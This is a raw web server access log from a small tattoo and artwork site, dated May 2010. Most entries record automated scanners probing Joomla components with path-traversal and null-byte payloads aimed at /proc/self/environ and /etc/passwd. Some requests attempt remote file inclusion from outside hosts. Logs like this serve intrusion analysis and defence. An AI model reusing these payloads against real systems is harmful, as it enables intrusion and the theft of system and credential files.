72.151.164.38 - - [14/May/2010:19:21:15 -0500] "GET /tattoo/links.htm HTTP/1.1" 200 1325 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
72.151.164.38 - - [14/May/2010:19:21:15 -0500] "GET /tattoo/chinchil.JPG HTTP/1.1" 200 22675 "http://tomdolan.pconline.com/tattoo/links.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)"
212.47.221.153 - - [14/May/2010:19:24:59 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.812"
212.47.221.153 - - [14/May/2010:19:25:00 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.812"
212.47.221.153 - - [14/May/2010:19:25:00 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.812"
87.250.255.243 - - [14/May/2010:19:25:06 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
93.100.57.182 - - [14/May/2010:19:25:07 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.816"
93.100.57.182 - - [14/May/2010:19:25:08 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
93.100.57.182 - - [14/May/2010:19:25:08 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.816"
174.123.133.162 - - [14/May/2010:19:26:15 -0500] "GET /logs/access_log.1273276800//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.834"
174.123.133.162 - - [14/May/2010:19:26:15 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
174.123.133.162 - - [14/May/2010:19:26:15 -0500] "GET /logs//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5643 "-""libwww-perl/5.834"
174.123.133.162 - - [14/May/2010:19:26:18 -0500] "GET /logs/access_log.1273190400//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.834"
93.100.57.182 - - [14/May/2010:19:27:38 -0500] "GET /logs/access_log.1273363200/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.816"
93.100.57.182 - - [14/May/2010:19:27:39 -0500] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
93.100.57.182 - - [14/May/2010:19:27:39 -0500] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.816"
189.16.34.178 - - [14/May/2010:19:31:23 -0500] "GET /logs/access_log.1273190400/index.php?redir=http://pixain.sitebr.net/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
173.192.220.100 - - [14/May/2010:19:34:58 -0500] "GET /joomla/index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
87.250.255.243 - - [14/May/2010:19:35:22 -0500] "GET /logs/access_log.1175990400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
93.100.57.182 - - [14/May/2010:19:37:20 -0500] "GET /logs/access_log.1273190400/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.816"
212.47.221.153 - - [14/May/2010:19:37:51 -0500] "GET /logs/access_log.1273190400/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.812"
173.192.220.100 - - [14/May/2010:19:39:13 -0500] "GET /logs/access_log.1273190400/joomla/index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 327 "-""libwww-perl/5.810"
173.192.220.100 - - [14/May/2010:19:39:13 -0500] "GET /joomla/index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
173.192.220.100 - - [14/May/2010:19:39:13 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 305 "-""libwww-perl/5.810"
207.46.13.98 - - [14/May/2010:19:40:09 -0500] "GET /logs/access_log.1254700800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.126.254.214 - - [14/May/2010:19:40:34 -0500] "GET /logs/access_log.1273276800/*.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.76"
209.126.254.214 - - [14/May/2010:19:40:35 -0500] "GET /logs/access_log.1273276800/*.php?option=com_rwcards&view=rwcards&controller=../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.76"
209.126.254.214 - - [14/May/2010:19:40:36 -0500] "GET /logs/access_log.1273276800/*.php?option=com_rwcards&view=rwcards&controller=../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.76"
209.126.254.214 - - [14/May/2010:19:40:37 -0500] "GET /logs/access_log.1273276800/*.php?option=com_rwcards&view=rwcards&controller=../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.76"
209.126.254.214 - - [14/May/2010:19:40:38 -0500] "GET /logs/access_log.1273276800/*.php?option=com_rwcards&view=rwcards&controller=../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.76"
209.126.254.214 - - [14/May/2010:19:40:40 -0500] "GET /logs/access_log.1273276800/*.php?option=com_rwcards&view=rwcards&controller=../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.76"
209.126.254.214 - - [14/May/2010:19:40:41 -0500] "GET /logs/access_log.1273276800/*.php?option=com_rwcards&view=rwcards&controller=../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.76"
209.126.254.214 - - [14/May/2010:19:40:42 -0500] "GET /logs/access_log.1273276800/*.php?option=com_rwcards&view=rwcards&controller=../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.76"
209.126.254.214 - - [14/May/2010:19:40:43 -0500] "GET /logs/access_log.1273276800/*.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.76"
209.126.254.214 - - [14/May/2010:19:40:44 -0500] "GET /logs/access_log.1273276800/*.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.76"
209.126.254.214 - - [14/May/2010:19:40:45 -0500] "GET /logs/access_log.1273276800/*.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.76"
209.126.254.214 - - [14/May/2010:19:40:46 -0500] "GET /logs/access_log.1273276800/*.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.76"
209.126.254.214 - - [14/May/2010:19:40:48 -0500] "GET /logs/access_log.1273276800/*.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.76"
87.250.255.243 - - [14/May/2010:19:41:04 -0500] "GET /logs/access_log.1217030400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.43 - - [14/May/2010:19:43:40 -0500] "GET /logs/access_log.1191542400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
93.100.57.182 - - [14/May/2010:19:44:49 -0500] "GET /logs/avatar.php?page=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.816"
93.100.57.182 - - [14/May/2010:19:44:50 -0500] "GET /avatar.php?page=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.816"
87.250.255.243 - - [14/May/2010:19:45:38 -0500] "GET /logs/access_log.1248652800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
212.47.221.153 - - [14/May/2010:19:46:28 -0500] "GET /logs/avatar.php?page=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.812"
212.47.221.153 - - [14/May/2010:19:46:28 -0500] "GET /avatar.php?page=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.812"
66.249.71.138 - - [14/May/2010:19:50:55 -0500] "GET /logs/access_log.1270598400 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
87.250.255.243 - - [14/May/2010:19:52:29 -0500] "GET /logs/access_log.1230508800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [14/May/2010:19:56:28 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 200 4192 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [14/May/2010:20:01:36 -0500] "GET /logs/access_log.1258675200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.48 - - [14/May/2010:20:01:39 -0500] "GET /logs/access_log.1263859200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.129.119.41 - - [14/May/2010:20:01:52 -0500] "GET /logs/access_log.1243209600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
208.80.193.34 - - [14/May/2010:20:02:35 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1; SpamBlockerUtility 4.7.1)"
67.195.112.180 - - [14/May/2010:20:02:58 -0500] "GET /artwork/playhouse.htm HTTP/1.0" 200 521 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [14/May/2010:20:04:46 -0500] "GET /artwork/index.htm HTTP/1.0" 200 11078 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.199.193 - - [14/May/2010:20:06:53 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [14/May/2010:20:07:19 -0500] "GET /logs/access_log.1200787200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
91.121.172.212 - - [14/May/2010:20:09:12 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.803"
89.163.145.196 - - [14/May/2010:20:09:26 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.830"
119.63.193.56 - - [14/May/2010:20:09:27 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Baiduspider+(+http://www.baidu.jp/spider/)"
207.46.204.238 - - [14/May/2010:20:11:39 -0500] "GET /logs/?N=D HTTP/1.1" 200 5638 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [14/May/2010:20:12:02 -0500] "GET /logs/access_log.1234396800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [14/May/2010:20:13:00 -0500] "GET /logs/access_log.1268956800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
89.163.145.196 - - [14/May/2010:20:13:02 -0500] "GET /logs/access_log.1273017600//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.830"
89.163.145.196 - - [14/May/2010:20:13:02 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.830"
89.163.145.196 - - [14/May/2010:20:13:03 -0500] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.830"
89.163.145.196 - - [14/May/2010:20:13:03 -0500] "GET /logs/access_log.1273363200//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.830"
91.121.172.212 - - [14/May/2010:20:13:21 -0500] "GET /logs/access_log.1273017600//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.803"
91.121.172.212 - - [14/May/2010:20:13:21 -0500] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.803"
91.121.172.212 - - [14/May/2010:20:13:21 -0500] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.803"
91.121.172.212 - - [14/May/2010:20:13:22 -0500] "GET /logs/access_log.1273363200//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.803"
67.195.112.180 - - [14/May/2010:20:18:46 -0500] "GET /logs/access_log.1213228800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [14/May/2010:20:19:16 -0500] "GET /logs/access_log.1215129600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [14/May/2010:20:19:51 -0500] "GET /logs/access_log.1265760000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
59.21.247.137 - - [14/May/2010:20:25:00 -0500] "GET /netcat/htmledit//join.php?DOCUMENT_ROOT=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
59.21.247.137 - - [14/May/2010:20:25:00 -0500] "GET /logs/access_log.1262476800/netcat/htmledit//join.php?DOCUMENT_ROOT=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
59.21.247.137 - - [14/May/2010:20:25:00 -0500] "GET /logs/netcat/htmledit//join.php?DOCUMENT_ROOT=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
87.250.255.243 - - [14/May/2010:20:26:41 -0500] "GET /logs/access_log.1246838400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [14/May/2010:20:34:39 -0500] "GET /logs/access_log.1233705600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [14/May/2010:20:40:21 -0500] "GET /logs/access_log.1221955200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [14/May/2010:20:41:14 -0500] "GET /logs/access_log.1241049600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.2.140 - - [14/May/2010:20:41:42 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.2.140 - - [14/May/2010:20:42:16 -0500] "GET /logs/access_log.1195257600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.50 - - [14/May/2010:20:43:40 -0500] "GET /logs/access_log.1174953600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [14/May/2010:20:47:11 -0500] "GET /logs/access_log.1251504000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
211.245.21.109 - - [14/May/2010:20:51:24 -0500] "GET /index.php?g4[path]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
87.250.255.243 - - [14/May/2010:20:52:54 -0500] "GET /logs/access_log.1225670400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
219.240.36.36 - - [14/May/2010:20:54:13 -0500] "GET /index.php?option=com_pcchess&controller=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
219.240.36.36 - - [14/May/2010:20:54:13 -0500] "GET /logs/access_log.1273190400%20%20/index.php?option=com_pcchess&controller=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
219.240.36.36 - - [14/May/2010:20:54:13 -0500] "GET /logs/index.php?option=com_pcchess&controller=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
219.240.36.36 - - [14/May/2010:20:54:13 -0500] "GET /logs/access_log.1273017600%20%20/index.php?option=com_pcchess&controller=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
204.232.202.236 - - [14/May/2010:20:56:17 -0500] "GET /logs/access_log.1231718400/index.php?dept=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.808"
204.232.202.236 - - [14/May/2010:20:56:20 -0500] "GET /index.php?dept=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
204.232.202.236 - - [14/May/2010:20:56:23 -0500] "GET /logs/index.php?dept=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.808"
213.5.70.66 - - [14/May/2010:20:57:12 -0500] "GET /logs/access_log.1235779200 HTTP/1.0" 404 298 "http://sexy-hot-busty-brunette-beauties.com""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1"
87.250.255.243 - - [14/May/2010:21:00:52 -0500] "GET /logs/access_log.1196035200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.185 - - [14/May/2010:21:03:10 -0500] "GET /logs/access_log.1225324800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [14/May/2010:21:04:50 -0500] "GET /logs/access_log.1246579200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.45 - - [14/May/2010:21:05:39 -0500] "GET /logs/access_log.1257724800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.245.21.109 - - [14/May/2010:21:06:03 -0500] "GET /logs/access_log.1273363200/index.php?g4[path]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
211.245.21.109 - - [14/May/2010:21:06:03 -0500] "GET /index.php?g4[path]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
211.245.21.109 - - [14/May/2010:21:06:04 -0500] "GET /logs/index.php?g4[path]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
67.195.112.180 - - [14/May/2010:21:09:45 -0500] "GET /logs/access_log.1234569600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
173.192.220.100 - - [14/May/2010:21:11:24 -0500] "GET /principal.php?conteudo=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""libwww-perl/5.810"
173.192.220.100 - - [14/May/2010:21:11:41 -0500] "GET /logs/principal.php?conteudo=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.810"
173.192.220.100 - - [14/May/2010:21:11:41 -0500] "GET /principal.php?conteudo=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""libwww-perl/5.810"
87.250.255.243 - - [14/May/2010:21:11:44 -0500] "GET /logs/access_log.1234742400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
173.192.220.100 - - [14/May/2010:21:11:48 -0500] "GET /logs/principal.php?conteudo=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.810"
173.192.220.100 - - [14/May/2010:21:11:48 -0500] "GET /principal.php?conteudo=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""libwww-perl/5.810"
200.62.142.217 - - [14/May/2010:21:12:09 -0500] "GET /logs/principal.php?conteudo=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.805"
200.62.142.217 - - [14/May/2010:21:12:10 -0500] "GET /principal.php?conteudo=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""libwww-perl/5.805"
173.192.220.100 - - [14/May/2010:21:14:15 -0500] "GET /logs/access_log.1231718400/principal.php?conteudo=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 324 "-""libwww-perl/5.810"
173.192.220.100 - - [14/May/2010:21:14:15 -0500] "GET /principal.php?conteudo=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""libwww-perl/5.810"
173.192.220.100 - - [14/May/2010:21:14:15 -0500] "GET /logs/principal.php?conteudo=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.810"
207.46.199.178 - - [14/May/2010:21:15:04 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [14/May/2010:21:18:35 -0500] "GET /logs/access_log.1214956800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
200.62.142.217 - - [14/May/2010:21:18:39 -0500] "GET /logs/principal.php?conteudo=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.805"
200.62.142.217 - - [14/May/2010:21:18:39 -0500] "GET /principal.php?conteudo=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""libwww-perl/5.805"
200.62.142.217 - - [14/May/2010:21:19:38 -0500] "GET /principal.php?conteudo=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""libwww-perl/5.805"
67.195.112.180 - - [14/May/2010:21:19:54 -0500] "GET /logs/access_log.1229212800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [14/May/2010:21:25:26 -0500] "GET /logs/access_log.1223683200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [14/May/2010:21:27:50 -0500] "GET /logs/access_log.1235088000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.133 - - [14/May/2010:21:35:39 -0500] "GET /logs/access_log.1164844800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [14/May/2010:21:35:54 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
174.123.133.162 - - [14/May/2010:21:41:26 -0500] "GET /logs/access_log.1272844800//index0.php?id=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.834"
174.123.133.162 - - [14/May/2010:21:41:27 -0500] "GET //index0.php?id=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.834"
174.123.133.162 - - [14/May/2010:21:41:27 -0500] "GET /logs//index0.php?id=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.834"
87.250.255.243 - - [14/May/2010:21:42:48 -0500] "GET /logs/access_log.1269734400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
200.62.142.217 - - [14/May/2010:21:45:55 -0500] "GET /logs/access_log.1231718400/principal.php?conteudo=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 324 "-""libwww-perl/5.805"
200.62.142.217 - - [14/May/2010:21:45:56 -0500] "GET /principal.php?conteudo=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""libwww-perl/5.805"
200.62.142.217 - - [14/May/2010:21:45:56 -0500] "GET /logs/principal.php?conteudo=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.805"
207.46.204.189 - - [14/May/2010:21:48:08 -0500] "GET /logs/access_log.1205971200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [14/May/2010:21:49:44 -0500] "GET /logs/access_log.1251331200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
208.115.111.248 - - [14/May/2010:21:55:07 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
207.46.204.244 - - [14/May/2010:21:55:09 -0500] "GET /logs/access_log.1191715200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.45.186.2 - - [14/May/2010:21:55:17 -0500] "GET /logs/access_log.1273276800////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.833"
207.45.186.2 - - [14/May/2010:21:55:17 -0500] "GET ////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.833"
207.45.186.2 - - [14/May/2010:21:55:17 -0500] "GET /logs////index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.833"
